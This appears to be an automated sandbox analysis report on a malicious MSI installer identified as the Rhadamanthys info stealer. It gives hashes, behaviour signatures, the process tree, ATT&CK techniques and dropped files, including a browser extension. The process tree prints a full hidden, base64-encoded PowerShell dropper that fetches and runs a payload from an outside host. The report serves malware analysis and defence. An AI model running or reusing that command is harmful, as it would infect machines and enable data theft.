Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-06-2024 06:42

General

  • Target

    setup.msi

  • Size

    24.5MB

  • MD5

    fdc648bf32226d52c766cb688801246d

  • SHA1

    5f619e26d4d301117047c437d9926834a4e28731

  • SHA256

    c0ef3f691eadec87fd949159e49d6dfd2ec864a7ec07290cfd128b09d31ab483

  • SHA512

    c2a921f284425588f4d683576f6f10c80f24cabfc58442075bcbbbdb6e707e04ee89817ec6cb60a32bfe2a9565fcf07fa715fe4d0acfd487459e28a9f5587d81

  • SSDEEP

    786432:2vMECzf6E8AFIkPe/Ey63gQY/RVbwhzP4:2vMuAmkPesy63gQY/v

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://opensun.monster/25053.bs64

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 14 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2912
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:4552
    • C:\Windows\system32\msiexec.exe
      msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi
      1⤵
      • Enumerates connected drives
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:840
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Enumerates connected drives
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1660
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding FCCBB6AC542C9FAE795696EC6BCF3195
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1612
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssEAB1.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiEAAE.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrEAAF.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrEAB0.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2020
      • C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\UnRAR.exe
        "C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\UnRAR.exe" x -p79d20ea766e8 "C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\ruw9eigh.rar" "C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\"
        2⤵
        • Executes dropped EXE
        PID:3064
      • C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\steamerrorreporter64.exe
        "C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\steamerrorreporter64.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:4164
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe explorer.exe
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2352
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBzAHUAbgAuAG0AbwBuAHMAdABlAHIALwAyADUAMAA1ADMALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3384
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
              5⤵
              • Enumerates connected drives
              • Checks processor information in registry
              • Enumerates system info in registry
              • Modifies data under HKEY_USERS
              • Modifies registry class
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:544
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=125.0.6422.142 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=125.0.2535.92 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x2dc,0x7ffca7ce4ef8,0x7ffca7ce4f04,0x7ffca7ce4f10
                6⤵
                  PID:2360
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2360,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=2356 /prefetch:2
                  6⤵
                    PID:908
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1948,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=2932 /prefetch:3
                    6⤵
                      PID:5024
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --field-trial-handle=2452,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=3104 /prefetch:8
                      6⤵
                        PID:4004
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3464,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=3532 /prefetch:1
                        6⤵
                          PID:4248
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3472,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=3796 /prefetch:1
                          6⤵
                            PID:2996
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3596,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=4092 /prefetch:1
                            6⤵
                              PID:1628
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=5096,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=5156 /prefetch:2
                              6⤵
                                PID:1016
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=5164,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=3456 /prefetch:8
                                6⤵
                                  PID:3828
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4376,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=5132 /prefetch:1
                                  6⤵
                                    PID:460
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4844,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=5684 /prefetch:1
                                    6⤵
                                      PID:1956
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5044,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=3928 /prefetch:1
                                      6⤵
                                        PID:404
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=5376,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=4192 /prefetch:8
                                        6⤵
                                          PID:332
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --field-trial-handle=5132,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=4308 /prefetch:8
                                          6⤵
                                            PID:3652
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5080,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=5924 /prefetch:8
                                            6⤵
                                              PID:388
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5916,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=5980 /prefetch:8
                                              6⤵
                                                PID:2764
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\125.0.2535.92\identity_helper.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\125.0.2535.92\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --field-trial-handle=6676,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=6704 /prefetch:8
                                                6⤵
                                                  PID:2996
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\125.0.2535.92\identity_helper.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\125.0.2535.92\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --field-trial-handle=6676,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=6704 /prefetch:8
                                                  6⤵
                                                    PID:1972
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3520,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=6904 /prefetch:1
                                                    6⤵
                                                      PID:3252
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=4840,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=5876 /prefetch:1
                                                      6⤵
                                                        PID:5152
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=7124,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=6944 /prefetch:1
                                                        6⤵
                                                          PID:5292
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=3896,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=4896 /prefetch:1
                                                          6⤵
                                                            PID:5484
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --field-trial-handle=6776,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=704 /prefetch:8
                                                            6⤵
                                                              PID:5724
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --field-trial-handle=6944,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=5876 /prefetch:8
                                                              6⤵
                                                                PID:5732
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=6704,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=6708 /prefetch:8
                                                                6⤵
                                                                  PID:5820
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=6584,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:8
                                                                  6⤵
                                                                    PID:6056
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5700,i,15920890596325950755,11869386783400691740,262144 --variations-seed-version --mojo-platform-channel-handle=868 /prefetch:8
                                                                    6⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:5288
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 1936
                                                                4⤵
                                                                • Program crash
                                                                PID:4704
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 1944
                                                                4⤵
                                                                • Program crash
                                                                PID:4056
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 1952
                                                                4⤵
                                                                • Program crash
                                                                PID:2700
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3060,i,3595107284059830391,18018199024659337217,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:8
                                                          1⤵
                                                            PID:2708
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2352 -ip 2352
                                                            1⤵
                                                              PID:2996
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2352 -ip 2352
                                                              1⤵
                                                                PID:3296
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2352 -ip 2352
                                                                1⤵
                                                                  PID:1292
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\125.0.2535.92\elevation_service.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\125.0.2535.92\elevation_service.exe"
                                                                  1⤵
                                                                    PID:4328
                                                                  • C:\Windows\system32\AUDIODG.EXE
                                                                    C:\Windows\system32\AUDIODG.EXE 0x518 0x49c
                                                                    1⤵
                                                                      PID:2748

                                                                    Network

                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                    Execution

                                                                    Command and Scripting Interpreter

                                                                    1
                                                                    T1059

                                                                    PowerShell

                                                                    1
                                                                    T1059.001

                                                                    Discovery

                                                                    Query Registry

                                                                    3
                                                                    T1012

                                                                    Peripheral Device Discovery

                                                                    1
                                                                    T1120

                                                                    System Information Discovery

                                                                    4
                                                                    T1082

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Config.Msi\e57e6b9.rbs
                                                                      Filesize

                                                                      21KB

                                                                      MD5

                                                                      1c4bfdf2074730ed5a9917a67db9c02b

                                                                      SHA1

                                                                      48e6a9e877dff5b85459f6c882d12e2e8083b8b6

                                                                      SHA256

                                                                      11d7b73188aedb72d89d9625f0664123f8204e665093f4ebab2d84b783e688fc

                                                                      SHA512

                                                                      048aade6c9339a10f3195a908915cc7f94d3da9183cbdb546ecc9182de448a3dcca65ffb57c139463b68ac853ff4778f1b6fd58ed47eae35c73c086accb20591

                                                                    • C:\Users\Admin\AppData\Local\HJdPxhnNe\config.js
                                                                      Filesize

                                                                      200B

                                                                      MD5

                                                                      6543162fc08ba83c21025902a15aab72

                                                                      SHA1

                                                                      aedd6ae3a1b8135e22e50a8771720415a7859066

                                                                      SHA256

                                                                      5e0733b5f800bd1d4a98a6acf4eafb73276ed147f775d0ba4df0e6a0d2c59654

                                                                      SHA512

                                                                      712b2fb7a8d664e828c4bcdb1f18460fb8a7c78c36e6ca222c16881765714f77f1d048bfa43095f93f25527d8a6f4338d0d7a1786261a2f37c9778d992d5d079

                                                                    • C:\Users\Admin\AppData\Local\HJdPxhnNe\ico.png
                                                                      Filesize

                                                                      3KB

                                                                      MD5

                                                                      40de419c81de274c26c63e0f23d91a3f

                                                                      SHA1

                                                                      3fda2c10bf0d84aa327e107730b3596fcd13d4fd

                                                                      SHA256

                                                                      7d1878c4a74f2b7c6deb2efb39aa4c1cef86b8792efd2022644437cad6c48af3

                                                                      SHA512

                                                                      a6c0a9328941b31ab92d7de6bfedb7012a66e10f1726a3648d8314a49fd37dfbed06c199db04ddf6a0da6f9d42d9a78378ea67e7399fd847d48e4427bbb0ff99

                                                                    • C:\Users\Admin\AppData\Local\HJdPxhnNe\manifest.json
                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      a426a5b97b2032c58538ee58c9ed7e43

                                                                      SHA1

                                                                      f070698366a9d990d2850c461eab6edff36175f1

                                                                      SHA256

                                                                      82abab030de48e279fb274f1bbb32d91e72348fd205107bfc30c09faf716a157

                                                                      SHA512

                                                                      4113bf37cc18b70a1f67f5df30dc979ba649b42249025aec1678397ffe6290f28daa62a93aa0c80c9053845c110e28a4418d0c18610160cac33cd543e2db08ce

                                                                    • C:\Users\Admin\AppData\Local\HJdPxhnNe\rules.json
                                                                      Filesize

                                                                      620B

                                                                      MD5

                                                                      6c96a8e0dc7f99afebd022054a96bff5

                                                                      SHA1

                                                                      836c9f51bbbc8e5dc096cee29d7354b3a2211de1

                                                                      SHA256

                                                                      464f3f4c07331ae1f15fe0e6a209b4cfaf8cfce14a7c79eb192cbf2c49bbcb19

                                                                      SHA512

                                                                      ebad39459aead9cac1d3d1bd27459de20f107a19c3492678b869d8488e014fb2fba168c7a0d98cfb7742a4052e20ba526bef29aa63cf79f923dbdb926c87469d

                                                                    • C:\Users\Admin\AppData\Local\HJdPxhnNe\src\background.js
                                                                      Filesize

                                                                      22KB

                                                                      MD5

                                                                      5c018bbd734469aadb9d065a63ebbe32

                                                                      SHA1

                                                                      d90571b3ae3f02bab2a67a3c59c537f8b2af4d6f

                                                                      SHA256

                                                                      07b9b8e49e61df70453a3c98b6671c1823145b0dc93218038070051de0a34209

                                                                      SHA512

                                                                      5ab625a74b6e15aa60049aaff0b044d9fc0379fa10fccd7c4d554e24b648ea6a9d38d7e4cf710f39d81375af924b40d285011928a5ed554a1b82da1054dbbeed

                                                                    • C:\Users\Admin\AppData\Local\HJdPxhnNe\src\content\main.js
                                                                      Filesize

                                                                      218KB

                                                                      MD5

                                                                      1dd2fe383955495f184461b44b7e67b6

                                                                      SHA1

                                                                      11ce15a76d75a34d69fa406f37c4ec0730bd503f

                                                                      SHA256

                                                                      4237306a00388360a640289e51cd9cc799e05965d78bba691a8b5b363f600e7f

                                                                      SHA512

                                                                      1e715f3036b2692b6fcc6b53499f271d6a786f17601bb0b2e6f05d2615f1c722538809741fdee33a086362158baf27527843204311ba1cd1060c41fd590d609f

                                                                    • C:\Users\Admin\AppData\Local\HJdPxhnNe\src\functions\clipper.js
                                                                      Filesize

                                                                      8KB

                                                                      MD5

                                                                      83e89ef8ac5cedcfb31f955890044353

                                                                      SHA1

                                                                      f69cb8b60999e83c1e8da70d637d15a876d70bb0

                                                                      SHA256

                                                                      0fea02710bb5013606f442ea62e4a8ce08ff1977c7f71907d7a6ab954d8b93d8

                                                                      SHA512

                                                                      97914ed7bb4c26fe3e92e1d115042438dd6091af6decbe5f4bb7f50e1b0b5bffda599723c891a94e66166bd5a0ddb8477324bd39eb8ec1505edf190d93458559

                                                                    • C:\Users\Admin\AppData\Local\HJdPxhnNe\src\functions\commands.js
                                                                      Filesize

                                                                      26KB

                                                                      MD5

                                                                      63412559ad95e29e9d66db59bcee99c2

                                                                      SHA1

                                                                      93ce2f9464fc23f4ccddad18644498c793018479

                                                                      SHA256

                                                                      3651e193252e07e4a237b752bfa68ba7b1b98089d7adc4dceba0a216309ce101

                                                                      SHA512

                                                                      8f322fdff3552dd169eb106dd640fca4c9a7745e3085b9557447aefb28dd41b2936a182938f723892ba9a2b295b7fbb33024d26708c5d95d7dd8cd37f4e5700f

                                                                    • C:\Users\Admin\AppData\Local\HJdPxhnNe\src\functions\csp.js
                                                                      Filesize

                                                                      6KB

                                                                      MD5

                                                                      94e35924bb49f3b21715943b48cbb0cb

                                                                      SHA1

                                                                      3fb4d6307e0ce0e259d33d4f3daab2d5efcceca6

                                                                      SHA256

                                                                      0456ac868e9a441b6361eb13c42e5ab389aece3c925e9625418abee73d988c19

                                                                      SHA512

                                                                      00fa64c0183d9014092b29d9b6e4beaaabc829044e8be989eddf6c5251a6c618b35a8bf9b1b6de9c733f53ff7c3a2f6ef4546c27ca3fe35bb8316012504aabf3

                                                                    • C:\Users\Admin\AppData\Local\HJdPxhnNe\src\functions\domain.js
                                                                      Filesize

                                                                      38KB

                                                                      MD5

                                                                      4cecc21ab788b4030ac759b169588b9c

                                                                      SHA1

                                                                      139009ca5eb493068b0ed6407bf268ce2311ebef

                                                                      SHA256

                                                                      11566e6d5f7985bc4ff49418b9a5dc8f555a1ce32ce2d3e1fa98d155d95fcf85

                                                                      SHA512

                                                                      c78a6e04e91beed1f82b8a94904aa7c8e0176d1c75de82a64f4c6ff3867fa8de022e342f89b7cf7b70fdbc28db4d8569313bd419b9869dbe85f708eb2a352410

